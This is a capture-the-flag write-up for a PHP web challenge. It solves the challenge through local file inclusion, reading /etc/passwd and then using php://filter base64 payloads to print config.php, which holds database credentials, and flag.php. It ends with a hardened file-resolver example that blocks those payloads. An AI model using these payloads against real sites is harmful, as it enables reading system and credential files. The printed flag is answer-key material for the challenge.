AUCHALL - [Web] - Intro


Challenge Description

The Introductions have to be really easy, no?

Solution

On opening the challenge, we were given an input.


If we give /etc/passwd as input, we get its contents back, which shows that the application is using some sort of include() function to load the file.


Typically, PHP applications use a config.php file to store database credentials.

Let's check config.php.


We got no output, because include() executes the PHP code in config.php instead of displaying it. This means we need to use a PHP filter to convert the output into base64:

php://filter/convert.base64-encode/resource=config.php


On decoding the base64 output, we got the database credentials:

<?php
    $host = "127.0.0.1";
    $user = "the_user";
    $pass = "%as21k.amu2SAVS51";
    $db = "cy243l";
    /*
        In a recent scan, I found out that the db user and the machine user had exact same usernames and passwords. 
        Do ping me once you've changed it.
    */
?>
 

But wait, we need the flag. Where is the flag?

I tried checking for flag.php:

php://filter/convert.base64-encode/resource=flag.php


Flag

Flag is dynamic

CY243L{b4s1c_lf1_f1lt3r_r3ad_eb8c9DD_eUcS_wIHW}
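
Mitigation, as an added example that is not part of the original writeup or the challenge's code: the include() pattern inferred above, next to a hardened resolver that rejects every payload used in this solution. The `page` parameter name, the `pages/` directory and the `resolve_page()` helper are assumptions, since the challenge source is not shown.

```php
<?php
// Assumed vulnerable pattern (kept commented out for contrast):
//   include($_GET['page']);
// include() accepts absolute paths (/etc/passwd) and stream wrappers
// (php://filter/...), and it executes any PHP it loads. That is why
// config.php printed nothing until it was base64-encoded first.

const PAGE_DIR = __DIR__ . '/pages';   // hypothetical template directory

// Map a user-supplied page name to a file inside PAGE_DIR, or return null.
function resolve_page(string $name): ?string
{
    // 1. Strict character allowlist: no slashes, dots or colons, so no
    //    traversal, no absolute paths and no scheme:// wrappers.
    if (!preg_match('/\A[a-z0-9_-]{1,32}\z/i', $name)) {
        return null;
    }
    // 2. Build the path server-side and canonicalise it.
    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null;                   // directory or file does not exist
    }
    // 3. Defence in depth: the resolved path must stay under PAGE_DIR
    //    (catches symlinks that point elsewhere).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed inputs: one benign name plus the payloads from this writeup.
// 'home' resolves only if pages/home.php exists next to this script.
$samples = [
    'home',
    '/etc/passwd',
    'config.php',
    'php://filter/convert.base64-encode/resource=config.php',
    'php://filter/convert.base64-encode/resource=flag.php',
];
foreach ($samples as $s) {
    printf("%-56s => %s\n", $s, resolve_page($s) ?? 'REJECTED');
}
// In a handler: include only a non-null resolve_page() result, else 404.
```

Keeping config.php and similar files outside the directory the resolver can reach means a bypass of the name check still cannot read credentials.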

Writeups 2023 © RootxRAN.